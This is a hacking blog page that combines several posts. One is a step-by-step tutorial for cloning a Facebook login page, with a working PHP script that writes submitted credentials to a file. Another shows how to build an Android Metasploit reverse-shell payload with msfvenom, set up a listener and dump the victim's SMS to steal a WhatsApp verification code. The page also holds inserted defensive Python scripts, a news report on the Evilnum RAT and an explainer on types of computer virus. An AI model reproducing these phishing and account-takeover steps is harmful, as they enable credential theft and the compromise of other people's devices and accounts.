
Showing posts with label Virus. Show all posts

Tuesday 15 September 2020

How To Create Phishing Page For Any Website (Easy Tutorial)

In this tutorial I am going to teach you how to create your own phishing pages for your desired websites. This tutorial is very easy, but you must have some patience and a little skill to do it.


Also Read: What Is Phishing and How To Secure Your Accounts from This attack


As you know, phishing requires some coding knowledge such as HTML, CSS, JavaScript and a little PHP. If you don't have any idea about these, then it is very difficult to create your own phishing page.

If you have at least the basics of HTML, then follow this tutorial to create your own phishing page; otherwise leave this tutorial, it is not for you.

How To Create Phishing Page Step By Step Guide


In order To create your own phishing page you have to find your target website , I mean you have to get the website's login portal 

Mostly people search for How To create phishing page for Facebook , in Facebook the login portal is visible in the main page so here you need not to find out the login page 

Here am Not Confusing you by writing too much 

If you want to create  phishing page for a particular website then open the website in a good web browser such as chrome 

If you want to create phishing page for Facebook then open facebook.com 

Then right click on mouse you will see a Option view source code then click on it 

Or you can directly press CTRL+U to see the source code 

Most of the people search for How To Create Your phishing page with android Mobile , there is no Source code viewer option so how to do 

to view source code of any website you can search for online source code viewers

But in android you can type view-source: 
In front of url to see the source code 
Eg:

View-Source:www.facebook.com


Now Copy all the Source code starting from <html> to the end tag of </html> 

Now open Notepad and paste the copied codes 

Now find the tag <form action="

And replace login.php in action 

Eg:

<form action="login.php"

Now save the file as index.html

In android you can use droid edit app to edit html  files 

copy below code and save it as
login.php

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("users.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

You can change facebook.com with any url 

Now create another file 

Don't write anything just save as users.txt  

Now you have all Done 

Just upload all the files ( index.html, login.php and users.txt )to a free web hosting server and make sure you give chmod 777 permission to users.text file

Finally This tutorial is only for educational purpose , we are not responsible for any misuse
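Seen from the defender's side, a page assembled this way has a recognisable shape: the copied markup still points at the real site, while the password form posts to a handler on whatever server hosts the copy. The check below is an added example, not part of the original post; the function names, the sample markup and the host `free-host.example` are constructed for illustration.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


def site_of(url):
    """Crude 'site' key: last two host labels (assumption: no public-suffix list)."""
    host = (urlparse(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])


class PageScanner(HTMLParser):
    """Collects forms that carry a password field and the sites the markup links to."""

    def __init__(self):
        super().__init__()
        self.forms = []                 # one dict per <form>
        self.linked_sites = Counter()   # site -> number of absolute references
        self._open_form = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._open_form = {"action": attrs.get("action") or "", "password": False}
            self.forms.append(self._open_form)
        elif tag == "input" and self._open_form is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._open_form["password"] = True
        # Absolute URLs left over from copied markup reveal the site it came from.
        for name in ("href", "src", "content"):
            value = attrs.get(name) or ""
            if value.lower().startswith(("http://", "https://")):
                self.linked_sites[site_of(value)] += 1

    def handle_endtag(self, tag):
        if tag == "form":
            self._open_form = None


def assess_login_page(page_url, html):
    """Return triage findings for one fetched page (heuristic, not a verdict)."""
    scanner = PageScanner()
    scanner.feed(html)
    serving_site = site_of(page_url)
    top = scanner.linked_sites.most_common(1)
    findings = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        target = urljoin(page_url, form["action"])  # resolves relative actions
        if urlparse(target).scheme != "https":
            findings.append("password-over-plain-http")
        # Markup mostly references site X, yet the page is served from elsewhere
        # and the credentials are posted to something that is not X.
        if top and top[0][0] != serving_site and site_of(target) != top[0][0]:
            findings.append("brand-mismatch:" + top[0][0])
    return findings


# Constructed sample: markup that references one site but posts to a local handler.
CLONE = """<html><head>
<link rel="canonical" href="https://www.facebook.com/">
<meta property="og:url" content="https://www.facebook.com/">
<link rel="stylesheet" href="https://static.facebook.com/rsrc/a.css">
</head><body>
<form action="login.php" method="post">
<input type="text" name="email"><input type="password" name="pass">
</form></body></html>"""

if __name__ == "__main__":
    print(assess_login_page("http://free-host.example/index.html", CLONE))
    print(assess_login_page("https://www.facebook.com/", CLONE))
```

Pages that load most of their assets from a third-party CDN will also trip the mismatch rule, so treat the output as a queue for review and pair it with an allowlist.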

How To Hack WhatsApp Using Termux

Hello guys, most of you have requested this, so in this post I am going to explain how you can use Termux to hack WhatsApp. Let's see: can we really hack someone's WhatsApp account using Termux?

The fact is that using SS7 in Termux is not possible, and therefore we aren't going to experiment with SS7 in Termux; instead I am going to tell you how you can hack using some available tools.

Before we proceed, you must know how to use Termux. If you're a newbie, then follow the link below to learn how to use Termux effectively for ethical hacking, or if you're familiar with Termux then you can install popular hacking tools in Termux.

If you're interested in hacking WhatsApp using Termux, then there are some scenarios you need to keep in mind:

  •  Most of the times you need the OTP to verify WhatsApp
  • You and your victim must be connected to the same Wi-Fi(Spoofing Method)
  • Either you have to hack the victim Mobile somehow


Sounds terrible ☹️

how to hack a whatsapp account using termux

It's been a long time you are asking us how to hack other whatsapp using termux
hacking WhatsApp through Termux is little bit harder and the success rate is quite low,

Most of you guys are asking that how to use QRjacker in Termux,

Note that QRjacker is not working on Termux so we can use it on Termux if we install Kali Linux in Termux

So in this tutorial am going to tell you how to install Metasploit in Termux and generate a payload then install the payload to victim phone, then remote access to the phone over the internet

Let's see

Firstly install Termux

Then type below command to install Metasploit Framework

 apt update && apt upgrade && apt install unstable-repo && apt update && apt install metasploit && msfconsole


That's all, Metasploit Framework will be installed in Termux

Hack WhatsApp with Termux using Metasploit



Now you have to create a payload
For that type this command

 msfvenom -p android/meterpreter/reverse_tcp LHOST=ur IP LPORT=anyport -a dalvik --platform android R > /sdcard/appname.apk





In LHOST, you must specify your Local IP Address, you can get IP by typing ifconfig in Termux

In LPORT you can give any port

After hitting the following command
Now appname.apk file will be created on your sdcard

You can give any name but I have chosen appname

Now you have to install the APK file in your victim phone

After installation you can listen to it
For that you have to run Metasploit framework and type below command

 msfconsole -x “use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST your IP; run”


That's all, you can listen to it
You can do some stuff like accessing camera, Files, read contacts

Since we are going to hack WhatsApp, for that we have to install WhatsApp on our phone or we can use Parallel Space

during Registration you have to give your victim's phone number

Now the OTP will be sent to his/her mobile
It's time to use dump_sms command
After that it will create a .txt file which contains the SMS

Now you can use nano to read the message
And copy the code and use it for WhatsApp verification

That's all, in this way we can hack whatsapp using termux

Still have anything to ask then feel free to comment below

Evilnum Hackers Targeting Financial Firms With A New Python-based RAT


An adversary known for targeting the fintech sector at least since 2018 has switched up its tactics to include a new Python-based remote access Trojan (RAT) that can steal passwords, documents, browser cookies, email credentials, and other sensitive information.

According to an analysis published by Cybereason researchers yesterday, the Evilnum group has not only tweaked its infection chain but has also deployed a Python RAT called "PyVil RAT," which can gather information, take screenshots, capture keystroke data, open an SSH shell and deploy new tools.

"Since the first reports in 2018 through today, the group's TTPs have evolved with different tools while the group has continued to focus on fintech targets," the cybersecurity firm said.

"These variations include a change in the chain of infection and persistence, new infrastructure that is expanding over time, and the use of a new Python-scripted Remote Access Trojan (RAT)" to spy on its infected targets.

Over the last two years, Evilnum has been linked to several malware campaigns against companies across the UK and EU involving backdoors written in JavaScript and C# as well as through tools bought from the Malware-as-a-Service provider Golden Chickens.


Back in July, the APT group was found targeting companies with spear-phishing emails that contain a link to a ZIP file hosted on Google Drive to steal software licenses, customer credit card information, and investments and trading documents.

While the modus operandi of gaining an initial foothold in the compromised system remains the same, the infection procedure has witnessed a major shift.

Besides using spear-phishing emails with fake know your customer (KYC) documents to trick employees of the finance industry into triggering the malware, the attacks have moved away from using JavaScript-based Trojans with backdoor capabilities to a bare-bones JavaScript dropper that delivers malicious payloads hidden in modified versions of legitimate executables in an attempt to escape detection. 

"This JavaScript is the first stage in this new infection chain, culminating with the delivery of the payload, a Python written RAT compiled with py2exe that Nocturnus researchers dubbed PyVil RAT," the researchers said.


The multi-process delivery procedure ("ddpp.exe"), upon execution, unpacks shellcode to establish communication with an attacker-controlled server and receive a second encrypted executable ("fplayer.exe") that functions as the next stage downloader to fetch the Python RAT.

"In previous campaigns of the group, Evilnum's tools avoided using domains in communications with the C2, only using IP addresses," the researchers noted. "While the C2 IP address changes every few weeks, the list of domains associated with this IP address keeps growing."


While Evilnum's exact origins still remain unclear, it's evident that their constant improvisation of TTPs has helped them stay under the radar.
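The researchers' observation that the C2 address rotates while the set of domains pointing at it keeps growing translates into a hunt over passive-DNS data. The following is an added example, not taken from the Cybereason report; the observations, domains and documentation-range IP addresses are constructed, and the thresholds are assumptions to tune.

```python
from collections import defaultdict
from datetime import date

# Constructed passive-DNS observations: (date seen, domain, resolved IP).
OBSERVATIONS = [
    (date(2020, 7, 6), "a.example", "192.0.2.10"),
    (date(2020, 7, 14), "b.example", "192.0.2.10"),
    (date(2020, 7, 22), "c.example", "192.0.2.10"),
    (date(2020, 8, 3), "a.example", "198.51.100.7"),   # same domains, new address
    (date(2020, 8, 3), "b.example", "198.51.100.7"),
    (date(2020, 8, 11), "d.example", "198.51.100.7"),
    (date(2020, 8, 19), "e.example", "198.51.100.7"),
    (date(2020, 7, 6), "cdn.example", "203.0.113.5"),  # stable, single domain
    (date(2020, 8, 3), "cdn.example", "203.0.113.5"),
]


def weekly_new_domains(observations):
    """Map ip -> {(iso_year, iso_week): domains first seen on that IP that week}."""
    seen = defaultdict(set)
    per_week = defaultdict(lambda: defaultdict(set))
    for day, domain, ip in sorted(observations):
        if domain not in seen[ip]:
            seen[ip].add(domain)
            per_week[ip][tuple(day.isocalendar())[:2]].add(domain)
    return per_week


def growing_ips(observations, min_weeks=3, min_domains=3):
    """IPs that gained new domains in at least `min_weeks` distinct weeks."""
    flagged = {}
    for ip, weeks in weekly_new_domains(observations).items():
        total = set().union(*weeks.values())
        if len(weeks) >= min_weeks and len(total) >= min_domains:
            flagged[ip] = sorted(total)
    return flagged


def linked_ips(observations, seed_ip):
    """Follow shared domains from one address to every address they resolved to."""
    by_ip, by_domain = defaultdict(set), defaultdict(set)
    for _, domain, ip in observations:
        by_ip[ip].add(domain)
        by_domain[domain].add(ip)
    cluster, queue = {seed_ip}, [seed_ip]
    while queue:
        for domain in by_ip[queue.pop()]:
            for ip in by_domain[domain] - cluster:
                cluster.add(ip)
                queue.append(ip)
    return sorted(cluster)


if __name__ == "__main__":
    print(growing_ips(OBSERVATIONS))
    print(linked_ips(OBSERVATIONS, "192.0.2.10"))
```

Shared-hosting and CDN addresses accumulate unrelated domains too, so exclude known providers before pivoting or the cluster will over-link.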

As the APT's techniques continue to evolve, it's essential that businesses remain vigilant and employees monitor their emails for phishing attempts and exercise caution when it comes to opening emails and attachments from unknown senders.



Thursday 10 September 2020

What is a computer Virus | Types of viruses | How to be safe

 




1. What is a computer virus?

A computer virus is a malicious program that infects your computer. It uses files and folders as media to establish itself in your machine and spread. In the virtual world, a virus is extremely contagious, since it can use a network to damage all the machines linked together: PCs, but also printers, internal servers, NAS, and any other connected device.

2. Definition of Computer Virus

  • It is encrypted so that the information it contains remains hidden. This is how malware masks its presence.
  • Polymorphism: it can take many forms and act in different ways. It is therefore more difficult to identify it and put it out of harm's way.
  • Metamorphism: here the computer virus modifies all of its structure and instructions. It thus becomes even more difficult to flush out and recognize.
  • Stealth: in this case the virus tricks your operating system and your antivirus. In this game, rootkit type malware is the most effective. There are different methods for tricking antiviruses, including erasing traces of its passage or directing the protection software towards an uninfected portion of the hard disk that the virus will have previously copied.

3. What do viruses do on your computer?

Damage caused by viruses can range from temporary computer malfunction to serious damage. In general, a virus can:
  • Send you links to unwanted sites;
  • Erase your data;
  • Spy on you by copying your personal information (passwords, emails, etc.) and send them to a third party;
  • Cause the computer system to overheat to the point of rendering the computer unusable.

4. Main types of computer viruses

Modern viruses fall into several categories. Each can have different types of objectives and attack techniques. Among the main ones, we highlight:

4.1 Keylogger


The keylogger is a type of virus whose main objective is to capture all the information that is typed on the computer. This data collection will be permanent and all information will be sent to the person responsible for distributing the malware. Thus, it is possible to collect data such as passwords for social networks, emails, and credit cards.

4.2 Ransomware


Ransomware is one of the worst types of today's computer viruses. Attacks carried out with this type of malware can cause great damage to companies, ranging from loss of critical data to financial values.

In addition, while the attack is being carried out, the establishment will not be able to perform its daily activities that depend on the computer system, which makes it vital to use techniques to prevent this type of threat.

The attack of a ransomware virus is done through a complex social engineering process. Hackers send messages to users of a corporate system, simulating real content and encouraging the download of an infected file. After opening the file, the malicious software scans the company's network, looking for loopholes that allow access to internal systems and private data.

Once this step is completed, all available information is encrypted and access to the data is blocked.

In order for the company to resume its activities, a payment (usually in bitcoin) of variable value is required. And if the company tries to regain access to its data without payment, commands can be triggered to permanently delete files.

4.3 Spyware


Spyware is software that aims to capture information from users without their knowledge. As in the case of keyloggers, everything obtained is sent to the distributor of the infected files.

In general, this type of computer virus tracks a person's steps on the Internet and modifies the content of pages to display advertising that leads to the download of other types of computer viruses.

This is a feature that takes spyware to a higher level compared to the keylogger. In addition to capturing information such as passwords and credit card numbers, they can also modify computer settings and add additional software.

Its distribution can be done through fake websites, SPAM emails, and legitimate software, which are modified and published on pages that simulate famous program distribution sites.

4.4 Worms


Worms are a variant of viruses that became famous during the 2000s. They are characterized by their high ability to replicate on a network or set of computers without human interaction. In addition, they create additional copies of themselves inside the machines on which they are stored, making it difficult to completely remove them.

Despite being distributed using traditional techniques, such as spam messages and fake websites, worms gained strength by exploiting operating system flaws (especially Windows XP) that allowed automatic software to run through the pen-drive autorun. Thus, whenever a storage unit was connected to a new computer, the malware automatically installed itself on the system.

4.5 Trojan Horse


Trojan horses are among the most dangerous threats on the computer network. They disguise themselves as legitimate software so that, during their execution, other threats are installed on the user's computer.

Thus, exploiting flaws in the operating system, the hacker can control the machine, obtain personal data and even transform the device into a member of a zombie network (when the computer performs automated functions and is part of a network created to execute targeted attacks ).

4.6 Trojan Banking


It is a trojan characterized by access to bank details, shopping sites, social networks and email servers. Its attack is similar to the Trojan Horse, by sharing a file or software camouflaged as legitimate on infected pages or emails.

4.7 Blended Threats 


Also called compound threats, this type of computer virus is a combination of various malicious codes that can act as a large set of viruses simultaneously. This type of computer virus is able to reproduce itself, capture data, and allow the installation of other malware.

This type of software is distributed through fake emails and infected flash drives. Given their versatility, they can infect a wide range of devices and operating systems.

4.8 Adware


Adware, or advertising malware, is malware that can be easily identified: it presents itself as unwanted advertising. In some cases it is just annoying; in others it undermines security settings by tracking the user's activities to show ads where they generally would not have access.

4.9 Browser Hijacker


It is an unauthorized alteration of browser settings by malware. The home page and search pages are changed, ads are displayed on legitimate sites, and access is redirected to specific malicious sites.

4.10 Rootkit


A rootkit is a trojan that integrates with the operating system, allowing access to the computer while hiding its files and processes in some parts of the system. A rootkit is able to give hackers administrative access to your device or your network without you realizing it.

This malware can be installed via commercial security products and application extensions. Some antivirus programs can detect the behavior of rootkits, but the rootkits must be deleted manually.

4.11 CrossRAT


It is the newest computer virus discovered and is a dangerous threat with espionage characteristics. It can be found in several virtual environments that are considered safe, in URLs that are shared without restriction over the web. CrossRAT makes a complete scan of your system, allowing a hacker to send commands remotely to your PC; that is, he can spy and perform various activities on your machine.

5. How to be safe from viruses?


There are things you can do to avoid viruses: install an antivirus program, don't click on suspicious links or emails, and keep your operating system and computer programs updated with the latest security patches.

6. How to remove a computer virus?

There are several ways to remove a computer virus, depending on how dangerous it is and the extent of the damage. First of all, check that your antivirus is up to date. If it is not, perform the recommended update. In particular, the virus definitions of the program should be kept up to date. These are composite sketches of circulating viruses that allow the software to identify malicious intruders and notify you of their presence.

If you bought a new antivirus, don't let the two coexist. If you are on Windows 10, it is possible that you have Windows Defender activated. As native software, this program cannot be removed. However, you can deactivate it. To do this go to Start menu > Settings > Update & security > Windows security > Virus and threat protection > Manage settings. If the Real-time protection switch is on, set it to off.



If your antivirus does not detect anything despite obvious malfunctions, there is software that runs without installation and specializes in identifying malware, Trojan horses, spyware, or phishing attempts. These tools can be used without problems alongside your antivirus to maximize your chances of success. We can cite ESET Online Scanner, with its one-time scan functionality, or the Online Scan / Clean Tool from Trend Micro, compatible with 64-bit or 32-bit Windows. The latter also makes it possible to analyze systems running Android.


6.1 Removal of Virus or Malware

Once your antivirus has detected the intruder, it will offer to remove it, and this deletion will erase all traces. But it is not always that simple, especially if the malware causes significant malfunctions. In the most extreme cases you may have to entrust your computer to a professional, especially if nothing works. There is also a way to free yourself from malware, as long as you know a little about it. Here's the procedure to follow:

  • Save all of your data on an external medium, an external hard drive for example. This step is fundamental to avoid the risk of losing important information that you do not otherwise have.
  • Format your computer's hard drive. Keep in mind that this process deletes all of the data on it, including software. If you had programs, whether paid or free, make sure you have kept the installation CDs or can find them on the internet in the correct version.
  • Install your operating system again.

Several antivirus designers offer software in ISO format to disinfect an operating system. They are usually free, like Kaspersky Rescue Disk or Ultimate Boot CD.


7. Top 5 Most Dangerous Computer Viruses


When we talk about a computer virus, we usually mean any kind of code designed to do harm and spread itself to more computers.

Viruses are created by malicious programmers who might want to use your computer to attack other targets or make money by stealing your personal information. They could also just be trying to see how far their virus will spread.

Different viruses can affect Windows, Mac OS, and Linux computers, and even the data servers that keep companies, and the internet itself, running. Antivirus programs help, but they can have trouble dealing with threats they've never seen before.


Over the years, there have been thousands and thousands of viruses spread online, and they've caused billions of dollars of damage from lost productivity, wasted resources, and broken machines. A few dozen of the viruses stand out: some spread especially quickly, or affected a lot of people, or created a ton of damage all by themselves. Some did all of the above.

Since a lot of viruses were very bad in a lot of different ways, it's hard to pick out which ones were objectively the worst. But with that in mind, here are 5 of those extra destructive viruses. These are snippets of code that changed the way people thought about computer security, both the people designing the viruses and the people trying to protect against them. So let's get started.


7.1 Melissa Virus


Say it's March 1999. You're an unsuspecting computer user who's never gotten a virus, let alone been trained to look for the signs that an email might be malicious. You get an email from someone you know, with a subject line that says it's an important message. The message inside just says "Here's that document you asked for, don't show it to anyone."

The attachment is a Word document labeled "LIST", so you click on it because you're curious, and a list of porn sites pops up. At this point, you realize that the email was probably some kind of virus. But it's too late: the first 50 people in your address book have already gotten a copy of the exact same email, with a subject line saying that the message is from you. That was the Melissa Virus.

The Melissa virus was spread through Microsoft's Outlook email program, and even though the attachment seemed like an innocent Word document, it was able to infect the computer because of something called a macro. A macro is a specific kind of computer program that's used to create shortcuts. Macros are meant to make it easier to edit a document: instead of manually making a set of changes to the document, a macro is a piece of code that lets you do it with one click.


The problem is that this functionality gives macros a lot of power over your computer. In just a few days, Melissa spread to hundreds of thousands of computers. It didn't do any damage to the computers, but it did slow email services way down and cost companies about $80 million overall.

The programmer behind this virus, David L. Smith, was caught about a week after Melissa was first released. He spent 20 months in prison and paid a $5000 fine. Why Melissa? Apparently, that was the name of a stripper he met in Florida.

7.2 I LOVE YOU VIRUS  


It was spread on 5 May 2000 and was also successful because of social engineering. It reached around 45 million computers in just two days and caused $10 billion in damage. The infected mail had the subject line "I LOVE YOU" and came with an attachment titled "love letter for you.txt".

When you clicked on the attachment, the virus would go through your system's files looking for media like documents, images, and audio files. Then it would overwrite them with copies of itself, so if you didn't have your files backed up, you'd lose all your data. Meanwhile, the virus would send itself to everyone in your address book. It was a type of virus called a worm, which means that it was a standalone program.

It looked like a text document, but the virus file was actually a Visual Basic script, which uses the file extension .vbs. Users couldn't see .vbs at the end of the filename, though, because the Windows OS they were using hid file extensions by default. A Visual Basic script sends your computer a set of instructions to execute, so if they're meant to cause harm it can be very dangerous.


The virus was attributed to two programmers in the Philippines. But even though they were both arrested, they were released, because at the time there wasn't any law against what they'd done.

7.3 SQL slammer


On 25 January 2003, just before 6 a.m., the internet broke. South Korea lost both internet and cell phone service. 300,000 people in Portugal couldn't connect to the internet. Airlines couldn't process tickets and had to cancel flights. Bank ATMs went down. 911 in Seattle had to start using paper to log calls. Even for a lot of devices that were still connected to the internet, the connections had suddenly become very slow, even by 2003 standards.

SQL Slammer was a worm that targeted SQL servers, which store databases using a piece of Microsoft software called Microsoft SQL Server. It worked by taking advantage of a bug in the software: it sent the server a specially formatted piece of code, one that looked like it was just an ordinary request for information, but actually reprogrammed the server to send out more copies of the same worm.

The worm spread faster than any other virus ever had, infecting 75,000 servers in just 10 minutes. Those servers were all sending requests to thousands of other servers, which couldn't handle all the traffic. In all, millions of servers were affected, and the internet went kaput for a while.


Slammer is thought to have caused about $1.2 billion in damage before it was stopped, and the programmer behind it was never caught. The whole mess could have been prevented, though: six months earlier, Microsoft had released a fix for the bug, but lots of people just hadn't installed it yet.

7.4 Storm Worm 

Storm Worm, which appeared on 19 January 2007, was another worm that spread through email. But its purpose wasn't to destroy your computer or information; it wanted to take over your computer instead. The original subject line read "230 dead as storm batters Europe", which is where the virus gets its name.

But instead of an attachment, the email contained a link to a website, which promptly downloaded the virus onto the user's machine. Storm Worm was designed to be as invisible as possible so that you wouldn't detect and destroy it. This way it was able to use your computer to do all kinds of stuff in the background.

The virus would connect your machine to a botnet, a collection of computers that form a network. But at first, the network didn't actually do very much; it just grew. To make matters worse, antivirus programs had trouble finding the virus on an infected machine. The code for Storm Worm was designed to change every half hour, so it always looked different. The people behind it just sold the network to other criminals and scammers. After a while, companies did figure out how to stop the virus from spreading. The people behind it were never caught.

7.5 Mebroot/Torpig


Mebroot is also a virus that slowly started to spread in 2007, and its main goal was also to hook you up with a botnet, called Torpig. Both are especially sophisticated. Mebroot usually gets into your computer via a drive-by download, where you visit a malicious web page and the program starts to download in the background without you even knowing it. From there, it overwrites the master boot record, the part of your computer's hard drive that stores the instructions that tell your computer how to start up.


It can tell your computer what to do right from the start, and what it tells your computer is to connect to the Torpig botnet, which then steals all of your information. Torpig uses a spying technique known as man-in-the-browser, which is as creepy as it sounds.

It lurks in your browser, logging everything you do and any private information you enter. It also actively tries to steal information, using fake websites that look and behave exactly the same as the originals but send the data to the Torpig servers instead. By late 2008 Torpig had stolen info connected to 500,000 bank accounts, and again the people who created it haven't been caught.